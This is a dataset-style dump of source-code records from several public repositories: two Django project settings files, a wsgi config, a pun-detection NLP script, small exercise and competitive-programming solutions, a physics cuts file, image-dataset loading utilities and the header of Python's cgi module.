blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6f4797b2cfe1a4f784600f46363ae64503d90490 | f40abc56db1b2c081f25f19101c732d364619832 | /mysite/settings.py | 2ca5f9c5d129019b2e7b2feee4abbcd1bfbec60e | [] | no_license | plaville/my-first-blog | e652545f7cc978db01e5ed0b93f0083b53dc8454 | 67b83813d1174e256514a682c125c725b2d6f566 | refs/heads/master | 2021-04-28T10:20:59.984478 | 2018-02-28T16:48:36 | 2018-02-28T16:48:36 | 122,064,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,207 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'mn+@_p#+izajf+iectfcl_roqw7s+t%gs-p5tmqkws)uctz*^a'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', 'plaville.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Paris'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"laville.pierre@ymail.com"
] | laville.pierre@ymail.com |
adedb1a38e0c33e1ca1211e5434cc9b33cba117b | a540b456d4d452a1be25683b46c8e3e490448cdf | /api_turismo/settings.py | 4421e149e5e4d9b5b51548ca3fde7a9694f7cf64 | [] | no_license | Marcelogreick/api-turismo | db76af2ed576e5b8a0f2b2a7dc30de4415b501cd | b94a09befaba7b482f105cb88647e5f07ebe5d41 | refs/heads/master | 2022-12-17T03:52:00.885739 | 2020-09-25T15:56:25 | 2020-09-25T15:56:25 | 298,617,548 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,180 | py | """
Django settings for api_turismo project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'pf&pgr2&%z-n4rgmgdj$_%-9blfz!r(ui#$cl69(5^0tiqqv7k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'core',
'attractions',
'comment',
'assessments',
'adresses',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'api_turismo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'api_turismo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"mgreick25@gmail.com"
] | mgreick25@gmail.com |
5ce6da022af74db3e8ba7d1a8ca36fc9ab2385c7 | a601e6b3cf1db0bd96419b7d5668924184352c80 | /Phonetic/Pun_Detection/Pun_Detection.py | 6d062aea56153d042de8eca0b3d04b8df6dfa8b9 | [] | no_license | Parmeetsinghsaluja/Pun-Detection-and-Interpretation | 82da1ec5a7cd62b2b687550c5af9cf961e3eadae | fafd4923180f7acfd10d20ba04e8d6800585668c | refs/heads/master | 2020-03-15T08:04:02.228530 | 2018-05-08T13:58:46 | 2018-05-08T13:58:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,031 | py |
#All imports
from __future__ import print_function
import phrasefinder as pf
import pronouncing as pp
import Levenshtein
import nltk
import glob, os
from nltk.corpus import stopwords
#Function to get frequency of a ngram from large corpus
def main(query,resultdict):
# Set up your query.
#set the maximum number of phrases to return.
options = pf.SearchOptions()
options.topk = 1
# Send the request.
try:
result = pf.search(pf.Corpus.AMERICAN_ENGLISH, query, options)
if result.status != pf.Status.OK:
resultdict[query] = 0
return
for phrase in result.phrases:
if query in resultdict.keys():
resultdict[query] = resultdict[query] + phrase.match_count
else:
resultdict[query] = phrase.match_count
if query not in resultdict.keys():
resultdict[query] = 0
except Exception as error:
resultdict[query] = 0
return
#Function to get frequency of a ngram based query from large corpus
def new_main(query,resultdict):
# Set up your query.
#set the maximum number of phrases to return.
options = pf.SearchOptions()
options.topk = 30
# Send the request.
try:
result = pf.search(pf.Corpus.AMERICAN_ENGLISH, query,options)
if result.status != pf.Status.OK:
return
for phrase in result.phrases:
skey = ""
for token in phrase.tokens:
skey = skey + token.text + " "
resultdict[skey] = phrase.match_count
except Exception as error:
return
#Function for generating ngrams
def ngrams(data, n):
#Creating a list to store n grams
lst=list()
#Intially splitting file using spaces
data = data.split()
#Ordered List
ordered_list= []
#Making ngrams
for i in range(len(data)-n+1):
#Apending data in ordered_list
ordered_list = ' '.join(data[i:i+n])
#Apending data in normal list
lst.append(ordered_list)
#Returning list
return lst
#Function for generating rhyming word of given word
def rhyme(word, level):
#Using cmu dict of nltk
entries = nltk.corpus.cmudict.entries()
#Getting syllables of the given word
syllables = [(wrd, syl) for wrd, syl in entries if wrd == word]
rhymes = []
#Finding rhymes of word
for (wrd, syllable) in syllables:
rhymes += [wrd for wrd, pron in entries if pron[-level:] == syllable[-level:]]
return set(rhymes)
#Function to check whether two given word are rhyming of each other
def doTheyRhyme ( word1, word2 ):
if not word1 in rhyme ( word2, 1 ):
if Levenshtein.distance(word1,word2) < 3:
return True
else:
return False
else:
return True
#Function to calculate Levenshtein Distance
def leven_distance(old_word, new_word):
#1st Technique
w_len_ch_old = len(old_word)
w_len_ch_new = len(new_word)
w_len_ch = min(w_len_ch_old ,w_len_ch_old)
#distance
dis_ch = Levenshtein.distance(old_word,new_word)
ratio_ch = (w_len_ch - dis_ch)/w_len_ch
#2nd and 3rd Technique
#Checking if phonetic representation exisist or not
if(len(pp.phones_for_word(old_word)))>0 and len(pp.phones_for_word(new_word))>0:
#2nd Technique
#Getting phonetic representation
old_word_phs = pp.phones_for_word(old_word)[0]
new_word_phs = pp.phones_for_word(new_word)[0]
w_len_phs_old = len(old_word_phs)
w_len_phs_new = len(new_word_phs)
w_len_phs = min(w_len_phs_old,w_len_phs_new)
#distance
dis_phs = Levenshtein.distance(old_word_phs, new_word_phs)
ratio_phs = (w_len_phs - dis_phs)/w_len_phs
#3rd Technique
#Getting phonetic representation without spaces
old_word_ph = old_word_phs.replace(" ","")
new_word_ph = new_word_phs.replace(" ","")
w_len_ph_old = len(old_word_ph)
w_len_ph_new = len(new_word_ph)
w_len_ph = min(w_len_ph_old,w_len_ph_new)
#distance
dis_ph = Levenshtein.distance(old_word_ph, new_word_ph)
ratio_ph = (w_len_ph - dis_ph)/w_len_ph
#Assigning a large value to get only true cases
else:
ratio_ph = -1000
ratio_phs = -1000
#Returning max ratio from all three Technique
ratio = max(ratio_ch, ratio_ph, ratio_phs)
#Assigning smallest value to get only true cases
if(ratio > 0.3):
return ratio
else:
return 0.0001
#Function to calculate score of two trigram
def score_function(new_trigram ,old_trigram ,old_word, new_word):
#Calculating Levenshtein distance
ratio = leven_distance(old_word, new_word)
if(ratio > 0.3):
trigram_freq_dict = dict()
len_new_word = 10
#Getting frequency of new and old trigram
main(new_trigram ,trigram_freq_dict)
main(old_trigram ,trigram_freq_dict)
score = (trigram_freq_dict[new_trigram] - trigram_freq_dict[old_trigram]) - (1/(ratio ** len_new_word))
else:
score = -1
return score
#Function to calculate score of two trigram
def score_pair(new_trigram ,old_trigram ,old_word, new_word, score_pair_dict):
score_pair_dict.update({old_word+" "+new_word : score_function(new_trigram ,old_trigram ,old_word, new_word)})
return score_pair_dict
#Function to detect whether given sentence is pun or not
def detect(query,count,output_dict):
query= query.lower()
if len (query.split()) > 3:
trigrams = ngrams(query.lower(),4)
else:
trigrams = ngrams(query.lower(),3)
score_pair_dict = dict()
POS_Tag_Set =("NN","NNS","JJ","JJR","JJS","RBR","RB","RBS","VB","VBD","VBG","VBN","VBP","VBZ","CD")
for trigram in trigrams:
fdict = dict()
main(trigram, fdict)
if fdict[trigram] > 500:
continue
else:
unigrams = ngrams(trigram,1)
#Filtering unigrams
unigram_pos_tags = nltk.pos_tag(unigrams)
for unigram_tagged in unigram_pos_tags:
if(unigram_tagged[1] not in POS_Tag_Set):
unigrams.remove(unigram_tagged[0])
for unigram in unigrams:
#Considering every unigram and creating new key
query_trigram = trigram.replace(unigram , "?")
replace_dict = dict()
#Getting one word different trigram
new_main(query_trigram, replace_dict)
#Creating set out of the trigram used for searching
new_keyset = set(query_trigram.split())
#Checking we get atleast 1 replacable trigram
if len(replace_dict.keys())>0:
for new_trigram in replace_dict.keys():
diffset = set()
#Creating set out of the new trigram
matchkeyset = set(new_trigram.lower().split())
#Getting the word which is changed in the trigram
diffset = diffset.union(new_keyset.symmetric_difference(matchkeyset))
#Removing the query character
if "?" in diffset:
diffset.remove("?")
#If old and new word are same then we have to remove it from list
if unigram in diffset:
diffset.remove(unigram)
#Finally getting new word
if len(diffset) > 0:
new_word = list(diffset)[0]
POS_Tag_Set =("NN","NNS","JJ","JJR","JJS","RBR","RB","RBS","VB","VBD","VBG","VBN","VBP","VBZ","CD")
tag_new_word = nltk.pos_tag(new_word)
if (tag_new_word[0][1] in POS_Tag_Set) and not (new_word in set(stopwords.words('english'))) and doTheyRhyme(unigram , new_word):
#Calculating score of two trigrams
score_pair_dict = score_pair(new_trigram ,trigram ,unigram, new_word, score_pair_dict)
if len(score_pair_dict.keys()) > 0:
#Find the max value
pair = max(score_pair_dict, key=score_pair_dict.get)
#For pun print 1 vice versa
if score_pair_dict[pair] > 0:
output_dict.update({"het_" + str(count) : str(1)})
print(count)
else:
output_dict.update({"het_" + str(count) : str(0)})
print(count)
else:
output_dict.update({"het_" + str(count) : str(0)})
print(count)
test_data_path= input("Enter Path of Test Data :")
output_path= input("Enter Path of Output File:")
os.chdir(test_data_path)
#getting all .txt files
for file in glob.glob("*"):
output_dict = dict()
#opening .txt files one by one
with open(file,"r",encoding="ISO-8859-1") as f:
#reading files one by one
lines=f.readlines()
count = 49
#Detecting the puns
for line in lines:
count = count + 1
detect(line,count,output_dict)
#Writing the output
with open(output_path+"/Output.txt","w+") as fu:
fu.write(str(output_dict))
| [
"saluja.parmeetsingh@gmail.com"
] | saluja.parmeetsingh@gmail.com |
f50f286ed59f3347ee5e05249c8f3bc7ae3887ea | bd75439eee4943da8c1a9e60c5e3c1bfc4caf042 | /config/wsgi.py | c0e63d1e662d612b78aba397891c4f62e4b42ff6 | [
"MIT"
] | permissive | CMCuritiba/wramais | fecaa3d4ee26b7f4295ca169e01d618cd8154486 | b06449a9ab73ac06b13887b95d035f7f59690be8 | refs/heads/master | 2021-06-01T13:50:35.071529 | 2019-05-16T19:16:29 | 2019-05-16T19:16:29 | 95,113,417 | 0 | 0 | null | 2018-04-09T19:05:10 | 2017-06-22T12:30:20 | Python | UTF-8 | Python | false | false | 1,716 | py | """
WSGI config for Chamados CMC project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from django.core.wsgi import get_wsgi_application
#if os.environ.get('DJANGO_SETTINGS_MODULE') == 'config.settings.production':
#from raven.contrib.django.raven_compat.middleware.wsgi import Sentry
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
#if os.environ.get('DJANGO_SETTINGS_MODULE') == 'config.settings.production':
# application = Sentry(application)
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| [
"alexandre.odoni@cmc.pr.gov.br"
] | alexandre.odoni@cmc.pr.gov.br |
fb82904f1f952f02d718d84fc8f368789d952778 | 58b9c50e3b55f711515e6869d4f1a0b617d1f597 | /Book exercises/Exercise 2. Comments and Pound Characters.py | 31e22ec3fbef91d5956dbf5cbd34b0da147f0f57 | [] | no_license | TomasHalko/pythonSchool | 70e40af08331b35c41df3ae5e1a8455796949faf | 3c298686a80229de41a135e3d7b30052395c3558 | refs/heads/master | 2022-12-19T17:38:45.449001 | 2020-10-07T12:25:42 | 2020-10-07T12:25:42 | 293,471,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | # A comment, this is so you can read your program later.
# Anything after the # is ignored by python.
print("I could have code like this.") # and the comment after is ignored
# You can also use a comment to "disable" or comment out code:
# print("This won't run.")
print("This will run.") | [
"tomashalko@gmail.com"
] | tomashalko@gmail.com |
0c2f558ec0494841857978e64f4fd0e8c8937538 | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/hr_recruitment/__init__.py | 2283b78b5f3c81ef2cc3a1d49ecbbb3c7b0b0f21 | [] | no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | # -*- encoding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from . import models
| [
"yasir@harpiya.com"
] | yasir@harpiya.com |
3e7ffafa559cd3e859a2316ab5e3ec983d4386e1 | 5fce342c9e598ac7ef2ab06047081db4d6661b9d | /python/abc/template/shakutori/AOJ-CTNW.py | e7f3d988a3186f21805a8c04818c29dceddd6a7c | [] | no_license | kp047i/AtCoder | 679493203023a14a10fca22479dbeae4986d2046 | 276ad0fab8d39d5d9a1251bb2a533834124f3e77 | refs/heads/master | 2022-07-26T21:49:29.490556 | 2020-06-28T14:28:12 | 2020-06-28T14:28:12 | 208,727,698 | 0 | 0 | null | 2022-06-22T02:11:01 | 2019-09-16T06:37:50 | Python | UTF-8 | Python | false | false | 957 | py | n, q = map(int, input().split())
a = list(map(int, input().split()))
x = list(map(int, input().split()))
# q回分のクエリを実行
for i in range(q):
ans = 0
# 区間の左端で場合分け
right = 0
_sum = 0
for left in range(n):
# sumにa[right]を加えても大丈夫ならrightを動かす
while right < n and (_sum + a[right]) <= x[i]:
_sum += a[right]
right += 1
# breakした状態でrightは条件を満たす最大
ans += right - left
# right == leftだったらその区間の最大の個数まで到達
if right == left:
right += 1
# それ以外はleftだけがインクリメントされるようにsumからa[left]を引いていく
else:
_sum -= a[left]
# 条件を満たせなくなるまでrightを増やしたので今度はleftをrightからスタート
print(ans)
| [
"takayuki.miura28@gmail.com"
] | takayuki.miura28@gmail.com |
5d46d3160485153a72aeaa43b0d98d716859314c | 5cdd13489c995d825985f8e76fb9641d83675972 | /PlotConfiguration/ISR/2016/fake_estimation/muon/LLSS/cuts.py | 313c13d35f546643f1eed5f28fcb69008150737b | [] | no_license | CMSSNU/MultiUniv | d506cea55b1f57e0694309e04b9584434c859917 | cb72ac8cba215598a0f09a46725123e071f9137f | refs/heads/master | 2020-04-20T06:23:13.425043 | 2020-03-25T08:11:31 | 2020-03-25T08:11:31 | 168,682,069 | 0 | 4 | null | 2020-02-13T10:14:48 | 2019-02-01T10:35:47 | Python | UTF-8 | Python | false | false | 509 | py | from CommonPyTools.python.CommonTools import *
SKFlat_WD = os.getenv('SKFlat_WD')
sys.path.insert(0,SKFlat_WD+'/CommonTools/include')
from Definitions import *
supercut = '1==1'
# for fake estimation
# LL same sign
cuts['detector_level'] = 'is_dimu_tri_passed == 1 && evt_tag_dimuon_rec_Fake == 1 && evt_tag_dielectron_rec_Fake == 0 && evt_tag_analysisevnt_sel_rec_Fake == 1 && dilep_pt_rec_Fake < 100. && dilep_mass_rec_Fake > 40 && evt_tag_oppositecharge_sel_rec_Fake == 0 && evt_tag_LL_rec_Fake == 1 '
| [
"jhkim@cern.ch"
] | jhkim@cern.ch |
21d87b38c81f0c4127ce255756ab74e382f0173e | 73b4befb5e94658f461325fe3e83e05970510c48 | /exercises/week10/exercise_visualization/utils/data_utils.py | bc91cf86460ad3b5d4d17dc7b70875e3a45a1c3e | [] | no_license | tlgjerberg/IN5400 | 9248fad83a79574db5ad604d9f419df807d80790 | 3c081f88f7996d86be873a6828cf78098df836eb | refs/heads/master | 2022-04-19T05:27:24.769356 | 2020-04-12T13:02:54 | 2020-04-12T13:02:54 | 235,559,404 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,147 | py | from __future__ import print_function
from builtins import range
from six.moves import cPickle as pickle
import numpy as np
import os
#from scipy.misc import imread
from PIL import Image
import platform
def load_pickle(f):
version = platform.python_version_tuple()
if version[0] == '2':
return pickle.load(f)
elif version[0] == '3':
return pickle.load(f, encoding='latin1')
raise ValueError("invalid python version: {}".format(version))
def load_CIFAR_batch(filename):
""" load single batch of cifar """
with open(filename, 'rb') as f:
datadict = load_pickle(f)
X = datadict['data']
Y = datadict['labels']
X = X.reshape(10000, 3, 32, 32).transpose(0,2,3,1).astype("float")
Y = np.array(Y)
return X, Y
def load_CIFAR10(ROOT):
""" load all of cifar """
xs = []
ys = []
for b in range(1,6):
f = os.path.join(ROOT, 'data_batch_%d' % (b, ))
X, Y = load_CIFAR_batch(f)
xs.append(X)
ys.append(Y)
Xtr = np.concatenate(xs)
Ytr = np.concatenate(ys)
del X, Y
Xte, Yte = load_CIFAR_batch(os.path.join(ROOT, 'test_batch'))
return Xtr, Ytr, Xte, Yte
def get_CIFAR10_data(num_training=49000, num_validation=1000, num_test=1000,
subtract_mean=True):
"""
Load the CIFAR-10 dataset from disk and perform preprocessing to prepare
it for classifiers. These are the same steps as we used for the SVM, but
condensed to a single function.
"""
# Load the raw CIFAR-10 data
cifar10_dir = '.data/cifar-10-batches-py'
X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)
# Subsample the data
mask = list(range(num_training, num_training + num_validation))
X_val = X_train[mask]
y_val = y_train[mask]
mask = list(range(num_training))
X_train = X_train[mask]
y_train = y_train[mask]
mask = list(range(num_test))
X_test = X_test[mask]
y_test = y_test[mask]
# Normalize the data: subtract the mean image
if subtract_mean:
mean_image = np.mean(X_train, axis=0)
X_train -= mean_image
X_val -= mean_image
X_test -= mean_image
# Transpose so that channels come first
X_train = X_train.transpose(0, 3, 1, 2).copy()
X_val = X_val.transpose(0, 3, 1, 2).copy()
X_test = X_test.transpose(0, 3, 1, 2).copy()
# Package data into a dictionary
return {
'X_train': X_train, 'y_train': y_train,
'X_val': X_val, 'y_val': y_val,
'X_test': X_test, 'y_test': y_test,
}
def load_tiny_imagenet(path, dtype=np.float32, subtract_mean=True):
"""
Load TinyImageNet. Each of TinyImageNet-100-A, TinyImageNet-100-B, and
TinyImageNet-200 have the same directory structure, so this can be used
to load any of them.
Inputs:
- path: String giving path to the directory to load.
- dtype: numpy datatype used to load the data.
- subtract_mean: Whether to subtract the mean training image.
Returns: A dictionary with the following entries:
- class_names: A list where class_names[i] is a list of strings giving the
WordNet names for class i in the loaded dataset.
- X_train: (N_tr, 3, 64, 64) array of training images
- y_train: (N_tr,) array of training labels
- X_val: (N_val, 3, 64, 64) array of validation images
- y_val: (N_val,) array of validation labels
- X_test: (N_test, 3, 64, 64) array of testing images.
- y_test: (N_test,) array of test labels; if test labels are not available
(such as in student code) then y_test will be None.
- mean_image: (3, 64, 64) array giving mean training image
"""
# First load wnids
with open(os.path.join(path, 'wnids.txt'), 'r') as f:
wnids = [x.strip() for x in f]
# Map wnids to integer labels
wnid_to_label = {wnid: i for i, wnid in enumerate(wnids)}
# Use words.txt to get names for each class
with open(os.path.join(path, 'words.txt'), 'r') as f:
wnid_to_words = dict(line.split('\t') for line in f)
for wnid, words in wnid_to_words.items():
wnid_to_words[wnid] = [w.strip() for w in words.split(',')]
class_names = [wnid_to_words[wnid] for wnid in wnids]
# Next load training data.
X_train = []
y_train = []
for i, wnid in enumerate(wnids):
if (i + 1) % 20 == 0:
print('loading training data for synset %d / %d'
% (i + 1, len(wnids)))
# To figure out the filenames we need to open the boxes file
boxes_file = os.path.join(path, 'train', wnid, '%s_boxes.txt' % wnid)
with open(boxes_file, 'r') as f:
filenames = [x.split('\t')[0] for x in f]
num_images = len(filenames)
X_train_block = np.zeros((num_images, 3, 64, 64), dtype=dtype)
y_train_block = wnid_to_label[wnid] * \
np.ones(num_images, dtype=np.int64)
for j, img_file in enumerate(filenames):
img_file = os.path.join(path, 'train', wnid, 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
## grayscale file
img.shape = (64, 64, 1)
X_train_block[j] = img.transpose(2, 0, 1)
X_train.append(X_train_block)
y_train.append(y_train_block)
# We need to concatenate all training data
X_train = np.concatenate(X_train, axis=0)
y_train = np.concatenate(y_train, axis=0)
# Next load validation data
with open(os.path.join(path, 'val', 'val_annotations.txt'), 'r') as f:
img_files = []
val_wnids = []
for line in f:
img_file, wnid = line.split('\t')[:2]
img_files.append(img_file)
val_wnids.append(wnid)
num_val = len(img_files)
y_val = np.array([wnid_to_label[wnid] for wnid in val_wnids])
X_val = np.zeros((num_val, 3, 64, 64), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'val', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_val[i] = img.transpose(2, 0, 1)
# Next load test images
# Students won't have test labels, so we need to iterate over files in the
# images directory.
img_files = os.listdir(os.path.join(path, 'test', 'images'))
X_test = np.zeros((len(img_files), 3, 64, 64), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'test', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_test[i] = img.transpose(2, 0, 1)
y_test = None
y_test_file = os.path.join(path, 'test', 'test_annotations.txt')
if os.path.isfile(y_test_file):
with open(y_test_file, 'r') as f:
img_file_to_wnid = {}
for line in f:
line = line.split('\t')
img_file_to_wnid[line[0]] = line[1]
y_test = [wnid_to_label[img_file_to_wnid[img_file]]
for img_file in img_files]
y_test = np.array(y_test)
mean_image = X_train.mean(axis=0)
if subtract_mean:
X_train -= mean_image[None]
X_val -= mean_image[None]
X_test -= mean_image[None]
return {
'class_names': class_names,
'X_train': X_train,
'y_train': y_train,
'X_val': X_val,
'y_val': y_val,
'X_test': X_test,
'y_test': y_test,
'class_names': class_names,
'mean_image': mean_image,
}
def load_models(models_dir):
"""
Load saved models from disk. This will attempt to unpickle all files in a
directory; any files that give errors on unpickling (such as README.txt)
will be skipped.
Inputs:
- models_dir: String giving the path to a directory containing model files.
Each model file is a pickled dictionary with a 'model' field.
Returns:
A dictionary mapping model file names to models.
"""
models = {}
for model_file in os.listdir(models_dir):
with open(os.path.join(models_dir, model_file), 'rb') as f:
try:
models[model_file] = load_pickle(f)['model']
except pickle.UnpicklingError:
continue
return models
def load_imagenet_val(num=None):
"""Load a handful of validation images from ImageNet.
Inputs:
- num: Number of images to load (max of 25)
Returns:
- X: numpy array with shape [num, 224, 224, 3]
- y: numpy array of integer image labels, shape [num]
- class_names: dict mapping integer label to class name
"""
#imagenet_fn = '/projects/in5400/visualization/imagenet_val_25.npz'
imagenet_fn = './data/imagenet_val_25.npz'
if not os.path.isfile(imagenet_fn):
print('file %s not found' % imagenet_fn)
assert False, 'Need to download imagenet_val_25.npz'
f = np.load(imagenet_fn)
X = f['X']
y = f['y']
class_names = f['label_map'].item()
if num is not None:
X = X[:num]
y = y[:num]
return X, y, class_names
| [
"tlgjerberg@protonmail.com"
] | tlgjerberg@protonmail.com |
f9c2f40f505b378f8301758253f7362e714120e9 | 4ff5ca8f95e6014fa76323a69f3fbcb91ae8db1f | /usr/lib/python3.8/cgi.py | e41e56e0987fdb28510766b99564fb42e1ee50f8 | [
"Python-2.0"
] | permissive | Nasera5222/git-sdk-32 | ad1ccd631958d1cdbc6f6c9d06793342d5c566ce | bcff70f916ec1f028f79036d5b913a7279fea0e5 | refs/heads/main | 2023-06-01T09:05:05.990441 | 2021-06-20T03:07:00 | 2021-06-20T03:07:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,548 | py | #!/usr/bin/python
# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is
# intentionally NOT "/usr/bin/env python". On many systems
# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI
# scripts, and /usr/local/bin is the default directory where Python is
# installed, so /usr/bin/env would be unable to find python. Granted,
# binary installations by Linux vendors often install Python in
# /usr/bin. So let those vendors patch cgi.py to match their choice
# of installation.
"""Support module for CGI (Common Gateway Interface) scripts.
This module defines a number of utilities for use by CGI scripts
written in Python.
"""
# History
# -------
#
# Michael McLay started this module. Steve Majewski changed the
